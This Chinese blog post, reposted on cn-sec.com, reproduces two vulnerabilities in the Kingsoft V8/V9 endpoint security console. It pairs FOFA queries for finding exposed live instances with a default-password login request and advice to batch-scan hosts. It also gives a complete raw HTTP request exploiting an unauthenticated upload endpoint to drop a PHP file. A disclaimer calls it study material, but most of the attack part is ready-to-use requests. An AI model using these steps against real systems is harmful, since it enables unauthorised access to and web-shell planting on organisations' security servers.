金山 V8 -V9 终端安全系统漏洞合集

admin
admin
admin
102075
文章
87
评论
2022年8月28日08:48:50评论240 views字数 2054阅读6分50秒阅读模式

 

一漏洞背景

      最近一个金山的漏洞闹得沸沸扬扬 有人要我分享下,我特意测试了下确实存在两个漏洞,第一个大家都知道的默认密码漏洞。第二个是未授权的上传漏洞。

二、漏洞复现

祭出fofa大法,fofa语法如下 

app="猎鹰安全-金山V8+终端安全系统" #V8 和v9都有title="在线安装-V8+终端安全系统Web控制台" #只搜V8,v9不存在弱口令 因为安装后第一次进入系统需要更改密码

具体看自己怎么操作了 

金山 V8 -V9 终端安全系统漏洞合集

先来一波测试弱口令

默认密码进去抓包 

金山 V8 -V9 终端安全系统漏洞合集

得到具体参数,根据反复观察我们了解到post一段json格式的代码到特定的路径,若返回包状态码为200并且有关键字段userSession即表示存在弱口令

POST /inter/ajax.php?cmd=get_user_login_cm{"get_user_login_cmd":{"name":"admin","password":"21232f297a57a5a743894a0e4a801fc3"}}

那么我们可以自己写一个批量的探测POC 当然也可以用burp直接批量跑也可以 看自己喜欢了

部分代码如下

金山 V8 -V9 终端安全系统漏洞合集

结果

金山 V8 -V9 终端安全系统漏洞合集

     这里就不在叙述了,最关键的来了  上传这块。很多人没有复现成功。我把我所成功的步骤分享下,其实也没什么。其实只是照着网络上流传的那样进行操作而已,(如果自己搭建可能不能成功)

    漏洞位置/tools/manage/upload.php

     在tools目录下的mange下存在一个upload.php。
     该文件可导致任意文件上传 

上传存放位置为根目录下的uploaddir中

金山 V8 -V9 终端安全系统漏洞合集

最终上传路径为文件的存储路径为$uploaddir+上传文件名

金山 V8 -V9 终端安全系统漏洞合集

那么我们构建一个请求

poc如下

POST /tools/manage/upload.php HTTP/1.1Host: ?Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=ee6g13ou1lrgi6rj8cjpljr8f5; SCNum=1; GUID=49309453-E3DD-417A-9181-1028E68BE797; SCIP=192.168.20.31; topSC=1; kidtype=6766; hid=E2821D1E; sn=107000-011007-292753-261525Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryCmFouLjmLS7D4iZr

------WebKitFormBoundaryCmFouLjmLS7D4iZrContent-Disposition: form-data; name="file"; filename="4bbc9855ce373d60847521589b287ced.php"Content-Type: image/jpeg
<%out.print(1237);%>------WebKitFormBoundaryCmFouLjmLS7D4iZr--

       年轻人要讲武德切勿做非法事情。我们学习的是思路 值得注意的是,感觉能打开几秒然后就没了,具体是什么原因暂时不知道 ,你在访问的时候可能就不行了。

金山 V8 -V9 终端安全系统漏洞合集

为了证明确实存在多进行一个步骤。不过依旧是如此。到底啥原因真不好说,是缓存导致的?还是什么,有知道的师傅可以留言 我会通过的,也好为大家解惑一下 感谢了

金山 V8 -V9 终端安全系统漏洞合集

HW期间 暂时不提供相关脚本相信大家也理解  做个小笔记。各路大神见笑了  欢迎大家可以加入群聊(已经满群)。为大家提供讨论的地方。可以后台回复加群  让管理拉您进群 欢迎各位师傅加入。一起讨论和学习


特别声明:

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,我不为此承担任何责任。


作者有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者的允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 切勿用于非法,仅供学习参考


原文始发于微信公众号(深夜笔记本):金山 V8 -V9 终端安全系统漏洞合集

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月28日08:48:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   金山 V8 -V9 终端安全系统漏洞合集https://cn-sec.com/archives/759421.html

发表评论

匿名网友 填写信息